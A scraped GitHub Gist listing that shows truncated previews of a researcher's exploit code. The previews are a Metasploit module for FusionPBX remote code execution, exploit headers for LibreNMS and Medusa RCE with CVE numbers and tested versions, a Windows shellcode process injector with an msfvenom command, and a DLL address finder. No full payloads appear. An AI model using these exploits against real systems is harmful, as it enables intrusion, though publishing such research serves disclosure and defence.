Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

Askar mhaskar

🎯
Focusing
  • iSecur1ty
  • Amman
Block or report user

Report or block mhaskar

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View fusionpbx_services.rb
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'FusionPBX v4.4.8 authenticated Remote Code Execution',
'Privileged' => true,
View librenms-exploit.py
#!/usr/bin/python
'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
View Shellcode-Process-Injector.c
#include <windows.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv){
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode
@mhaskar
mhaskar / find_address.py
Last active Oct 4, 2018
Find DLL function address using python
View find_address.py
#!usr/bin/python
'''
Description : find any windows function address from any DLL
Author : Askar @mohammadaskar2
'''
from ctypes import windll
import sys
@mhaskar
mhaskar / Medusa-Exploit.py
Created Aug 20, 2018
Unauthenticated RCE - Medusa Crowd-Sensing Framework (CVE-2018-15577)
View Medusa-Exploit.py
#!/usr/bin/python
'''
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
# Date: 16/08/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-15577 - RESERVED
# Vendor Homepage: https://github.com/USC-NSL/Medusa/
# Version: V1.0
# Tested on: Ubuntu 16.04 / PHP 7.0.28
@mhaskar
mhaskar / Medusa-Exploit.py
Created Aug 20, 2018
Unauthenticated RCE - Medusa Crowd-Sensing Framework
View Medusa-Exploit.py
#!/usr/bin/python
'''
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
# Date: 16/08/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-15577 - RESERVED
# Vendor Homepage: https://github.com/USC-NSL/Medusa/
# Version: V1.0
# Tested on: Ubuntu 16.04 / PHP 7.0.28
You can’t perform that action at this time.